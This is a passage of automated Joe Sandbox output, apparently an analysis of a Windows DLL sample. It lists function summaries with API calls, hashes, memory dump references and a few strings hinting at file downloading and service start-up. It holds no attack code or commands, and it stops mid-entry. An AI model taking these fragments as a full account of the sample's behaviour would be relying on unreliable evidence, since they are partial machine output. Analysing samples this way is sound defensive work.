                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$recv
                                                      • String ID:
                                                      • API String ID: 316788870-0
                                                      • Opcode ID: 908c792c3ed5b7cdadd5aad8e154ba28a449dc5bb33e0553786ecd67720522c2
                                                      • Instruction ID: f7e84451568a44ed458b9d5d2244c37d3f724e84309491f0b5f5bdd03eda6683
                                                      • Opcode Fuzzy Hash: 908c792c3ed5b7cdadd5aad8e154ba28a449dc5bb33e0553786ecd67720522c2
                                                      • Instruction Fuzzy Hash: 61118472100B119FD3308F69DC88747B7E5FF88321F508E2EE55AC26A0DBB5E8559B40
                                                      APIs
                                                      • HeapFree.KERNEL32(?,00000000,00000000,000002FB,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020000
                                                        • Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A
                                                      • _free.LIBCMT ref: 10020024
                                                      • HeapDestroy.KERNEL32(?,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020052
                                                      • HeapCreate.KERNEL32(?,?,?,?,?,000000FF,0000011F,?,10020F6F,00000001,?), ref: 10020061
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
                                                      • String ID:
                                                      • API String ID: 3571060031-0
                                                      • Opcode ID: 84ded86f95d57296fbd30c1761500bbdf8cef904f112831623cba76fd1813d80
                                                      • Instruction ID: b9c6984a8774ec933c58018bea8c4d1d370adf3d32408ad4e709cfd0ada2d52a
                                                      • Opcode Fuzzy Hash: 84ded86f95d57296fbd30c1761500bbdf8cef904f112831623cba76fd1813d80
                                                      • Instruction Fuzzy Hash: 2C111CB520070AFBE704CF65D894B96F7B9FF09340F504219E90897691EB71F924DB90
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 10025230
                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 10025242
                                                      • SwitchToThread.KERNEL32(?,?,?,?,93656AD3,?,?,?,?,?,10050C98,000000FF), ref: 10025263
                                                      • Sleep.KERNEL32(00000001,?,?,?,?,93656AD3,?,?,?,?,?,10050C98,000000FF), ref: 10025272
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CompareCurrentExchangeInterlockedSleepSwitch
                                                      • String ID:
                                                      • API String ID: 2093090637-0
                                                      • Opcode ID: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
                                                      • Instruction ID: f6dbf606553bdfc6012b380ff7cb12dc7a9431c74cd62dc39b8d8cbb32ce41fd
                                                      • Opcode Fuzzy Hash: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
                                                      • Instruction Fuzzy Hash: 64012636A40132DBDB21D7A4ECD87ADF358FB47363F914135ED87820C0C672484992A8
                                                      APIs
                                                      • _free.LIBCMT ref: 1002027A
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _free.LIBCMT ref: 10020282
                                                      • _malloc.LIBCMT ref: 100202D9
                                                      • _malloc.LIBCMT ref: 100202E6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free_malloc$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 2483110480-0
                                                      • Opcode ID: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
                                                      • Instruction ID: b96996ba9dd0fdd4b47136e9c24c81bb7b11f053f0dbecd90a5a6174a1790e6f
                                                      • Opcode Fuzzy Hash: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
                                                      • Instruction Fuzzy Hash: 681109B5501200DADB11DF14ED85B86BFA9EF41315F0880A9EE089E29BE7B6E414DBA4
                                                      APIs
                                                      • ___BuildCatchObject.LIBCMT ref: 100384B2
                                                        • Part of subcall function 10038AD4: ___AdjustPointer.LIBCMT ref: 10038B1D
                                                      • _UnwindNestedFrames.LIBCMT ref: 100384C9
                                                      • ___FrameUnwindToState.LIBCMT ref: 100384DB
                                                      • CallCatchBlock.LIBCMT ref: 100384FF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
                                                      • Instruction ID: 989c8a7310246bee1fd08c7f23ef03ea6940c226f7113538dbc51997d19096da
                                                      • Opcode Fuzzy Hash: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
                                                      • Instruction Fuzzy Hash: F3011336000209BFCF138F55CC05ECA3BBAFF58755F118054FA186A120D736EA61EBA1
                                                      APIs
                                                      • CreateIoCompletionPort.KERNEL32(?,00000000,?,00000000,7591E010,1002228A), ref: 1002271D
                                                      • PostQueuedCompletionStatus.KERNEL32(00000000,000000F1,00000000,00000000), ref: 10022749
                                                      • GetLastError.KERNEL32 ref: 10022762
                                                      • SetLastError.KERNEL32(00000000), ref: 10022770
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CompletionErrorLast$CreatePortPostQueuedStatus
                                                      • String ID:
                                                      • API String ID: 350138180-0
                                                      • Opcode ID: 23e7e0e93eabe9b0a1232ae1e61b86e39d6053f83dbb8d0c2970d0f328b7123e
                                                      • Instruction ID: 928306486aba1ddbb9230b49e88007acfead74f3a448b90459544f3a600550cb
                                                      • Opcode Fuzzy Hash: 23e7e0e93eabe9b0a1232ae1e61b86e39d6053f83dbb8d0c2970d0f328b7123e
                                                      • Instruction Fuzzy Hash: D4F06272208710AFE7709FA9FC88B97F3ECFB44715F01491AF146C6190D7B5A8868B60
                                                      APIs
                                                      • __lock.LIBCMT ref: 100417B9
                                                        • Part of subcall function 10037966: __mtinitlocknum.LIBCMT ref: 10037978
                                                        • Part of subcall function 10037966: __amsg_exit.LIBCMT ref: 10037984
                                                        • Part of subcall function 10037966: EnterCriticalSection.KERNEL32(00000000,?,100417BE,0000000D,1005F8C8,00000008,10041750,00000000,00000000,?,?,100092B7,?,?,?,1000A450), ref: 10037991
                                                      • InterlockedIncrement.KERNEL32(?), ref: 100417C6
                                                      • __lock.LIBCMT ref: 100417DA
                                                      • ___addlocaleref.LIBCMT ref: 100417F8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__amsg_exit__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 153627126-0
                                                      • Opcode ID: 95289a44549f5fdc7fe06f836b0ce9abde03bceab8c636a44ec7f77a1ec591e8
                                                      • Instruction ID: 00b42b5061005a85ff4ec3a4903eb6c6ca583381e5b1ec23b5cc802fa2244f26
                                                      • Opcode Fuzzy Hash: 95289a44549f5fdc7fe06f836b0ce9abde03bceab8c636a44ec7f77a1ec591e8
                                                      • Instruction Fuzzy Hash: 4E011B75540B44AEE721DF65C806B4AF7F0EF44321F208A1EE59ADB2A1CB74A644CB15
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
                                                      • GetTickCount.KERNEL32 ref: 10017478
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$CountFileLocalSystemTickUnothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 2988263349-0
                                                      • Opcode ID: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
                                                      • Instruction ID: e9295d616fd35ee15893a1400ce62d95032bf78b27ac2fe2c3c9e10ff6d825b8
                                                      • Opcode Fuzzy Hash: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
                                                      • Instruction Fuzzy Hash: 24F03177A00225ABDB00DBE9CD85ACB7BBDFB88250F404023EB05D3664D6B49545DF90
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000000), ref: 10016CBE
                                                      • WSACreateEvent.WS2_32 ref: 10016CCC
                                                      • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 10016CDB
                                                        • Part of subcall function 10035803: __EH_prolog3_catch.LIBCMT ref: 10043F5A
                                                      • GetCurrentProcessId.KERNEL32 ref: 10016CF9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Event$CreateCurrentH_prolog3_catchProcessSelectsocket
                                                      • String ID:
                                                      • API String ID: 220381849-0
                                                      • Opcode ID: ed7b730840a2e0f4208ad517c129e643274bdc2bf07c4fdadd40cefbe08bc09e
                                                      • Instruction ID: 5b502398bd1d20cbd50d5d3b603f0b2962fad5f82b537aec17aec2be3a6243bb
                                                      • Opcode Fuzzy Hash: ed7b730840a2e0f4208ad517c129e643274bdc2bf07c4fdadd40cefbe08bc09e
                                                      • Instruction Fuzzy Hash: D0F0F975601B119FE3205F6A9C4EA16FBE4FF84721F108A1EF5AAC66E0DBB094818B50
                                                      APIs
                                                      • _free.LIBCMT ref: 1001F9D7
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _free.LIBCMT ref: 1001F9DF
                                                      • CloseHandle.KERNEL32(?,?,1001ED87), ref: 1001FA25
                                                      • CloseHandle.KERNEL32(?,1001ED87), ref: 1001FA37
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle_free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 1377863804-0
                                                      • Opcode ID: c9a482df25fd7a3ae0442398cf946d3079553e94705a356f4e054a1ac26ce3ed
                                                      • Instruction ID: 11d5de15ce19ee5233239c03fae931e6f52a6be2bf4e98a15c78eb4f4e828f98
                                                      • Opcode Fuzzy Hash: c9a482df25fd7a3ae0442398cf946d3079553e94705a356f4e054a1ac26ce3ed
                                                      • Instruction Fuzzy Hash: 62F0E2B0401B10CBEB24DF30D95ABD6BBE4FF10B45F40881CE5AA9A691DB79B844CB90
                                                      Strings
                                                      • Downloaded File's count is zero,Not start up Service., xrefs: 1000FB4C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Downloaded File's count is zero,Not start up Service.
                                                      • API String ID: 0-1806316517
                                                      • Opcode ID: df162e2ea84d543d6cbb6a7c8a3fb6a8cf3a26ea56a0ee16716e0dbbd629577d
                                                      • Instruction ID: cbee9d66ead27164a73e2dca0d090da9dd38be7c8c3075d4cef95bd769ad6c28
                                                      • Opcode Fuzzy Hash: df162e2ea84d543d6cbb6a7c8a3fb6a8cf3a26ea56a0ee16716e0dbbd629577d
                                                      • Instruction Fuzzy Hash: 45617F70A002459BEB04DF68C591BAE37E4EF48384F1441BDEC05AF28BDB74DA44DB92
                                                      APIs
                                                      • _memmove.LIBCMT ref: 10028D97
                                                        • Part of subcall function 10002034: __EH_prolog.LIBCMT ref: 10002039
                                                        • Part of subcall function 10002034: _memmove.LIBCMT ref: 100020E7
                                                      • _memmove.LIBCMT ref: 10028E1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$H_prolog
                                                      • String ID: d
                                                      • API String ID: 1717342397-2564639436
                                                      • Opcode ID: 16cd8e6ecd1149faf014f2ec5afb424ce218564625e9db10f176e2c5d1d65bd8
                                                      • Instruction ID: daeeba4d545447bc68b8f95cee631ab7956dd3407f9c3d03369e5d5c969c9287
                                                      • Opcode Fuzzy Hash: 16cd8e6ecd1149faf014f2ec5afb424ce218564625e9db10f176e2c5d1d65bd8
                                                      • Instruction Fuzzy Hash: 246169B5D01249DFEF11CF98D881BDEBBB5EF14300F954069E8057B282D771AA85CBA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001BE83
                                                      • _sprintf.LIBCMT ref: 1001BEF8
                                                        • Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
                                                        • Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _sprintf$H_prolog_memmove
                                                      • String ID: hjh~$754jhghj%s%s%d
                                                      • API String ID: 543572939-138724396
                                                      • Opcode ID: 28b0bf22b7caca60c40920c12a0bcf267913406867ce6cdc72413e2974f7f49e
                                                      • Instruction ID: 8d56f2f0f22957003bd35aa17217555225fe44a01291db73dbb0cb64a86ffb3c
                                                      • Opcode Fuzzy Hash: 28b0bf22b7caca60c40920c12a0bcf267913406867ce6cdc72413e2974f7f49e
                                                      • Instruction Fuzzy Hash: FA316B36900508BFEB01DFE8C8809DEBBB9EF19310F04486AE606F7011D774AA49CB61
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001823A
                                                        • Part of subcall function 10018A47: __EH_prolog.LIBCMT ref: 10018A4C
                                                        • Part of subcall function 10018A47: std::locale::_Init.LIBCPMT ref: 10018A91
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • std::locale::_Init.LIBCPMT ref: 100182C4
                                                        • Part of subcall function 1003274C: __EH_prolog3.LIBCMT ref: 10032753
                                                        • Part of subcall function 1003274C: std::_Lockit::_Lockit.LIBCPMT ref: 1003275D
                                                        • Part of subcall function 1003274C: std::locale::_Setgloballocale.LIBCPMT ref: 10032779
                                                        • Part of subcall function 1003274C: _Yarn.LIBCPMT ref: 1003278F
                                                      Strings
                                                      • inc\http\HttpConnection.cpp, xrefs: 10018248
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::locale::_$H_prologInit$H_prolog3LockitLockit::_SetgloballocaleYarn_mallocstd::_
                                                      • String ID: inc\http\HttpConnection.cpp
                                                      • API String ID: 3634387935-15934736
                                                      • Opcode ID: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
                                                      • Instruction ID: 7a1205773bd905cc226a88309ac9bc09dfb51d4ddb2d57aec835063900d9c3eb
                                                      • Opcode Fuzzy Hash: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
                                                      • Instruction Fuzzy Hash: 8241C1B5600B418FC325CF59C580A96FBF4FF48314B50896ED89A8BB11E7B4BA09CF50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
